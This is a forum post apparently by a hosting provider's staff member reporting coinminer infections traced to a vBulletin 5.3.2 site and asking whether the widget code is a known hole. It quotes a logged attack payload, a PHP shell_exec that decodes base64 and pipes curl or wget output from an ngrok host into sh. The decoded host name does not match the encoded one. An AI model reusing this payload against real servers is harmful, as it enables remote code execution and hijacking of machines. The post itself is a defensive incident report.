vBulletin® Version 5.3.2 . We host the site, I do not have the owners login credentials to this forum. Please excuse if this post is inappropriate. That is not my intention.. If we need to repost in your tech form we will contact our customer accordingly for credentials.
We have been plagued with the Multios.Coinminer.Miner and the Unix.Malware.Agent virii the past few days.
The vector it is using to infect is a vbulletin site - or so it seems.
Sample log
0191018:[Thu Oct 17 18:01:45.891136 2019] [:error] [pid 9510] [client 194.99.105.75] ModSecurity: Warning. Pattern match "\\\\W{4,}" at ARGS:widgetConfig[code].
[file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"]
[msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');
found within ARGS:widgetConfig[code]: echo shell_exec('echo KGN1cmwgLW0gMzAgLXNrICdodHRwOi8vNWE1Yjk5OTgubmdyb2suaW8vZi9zZXJ2ZT9sPXYmcj1kZmEzYmNhOGE1MD IwYzNlMjdjZjY4ZjhlZDFjMjJkNycgfHwgd2dldCAtcSAtTy0gImh0dHA6Ly81YTViOTk5OC5uZ3Jvay5pby9mL3Nl cnZlP2w9diZyPWRmYTNiY2E4YTUwMjBjM2UyN2NmNjhmOGVkMWMyMmQ3IiApIHwgc2g=|base64 -d|sh;echo HHKU8JE');
Decode the base64 string =
(curl -m 30 -sk 'http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7' || wget -q -O- "http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7" ) | sh
No question this is the source of the virus infections. I downloaded the code...
The client ip's change but they all point to only one vbulletin site we host and the time stamps within the website access logs match exactly the virus files and directories creation times.
Is this a known bug - maybe with widget code in some way and we need to upgrade/patch? Posting before upgrading to see if this is a known issue with our version first.
Site permissions seem perfect.
Thank you
-Nick
Comment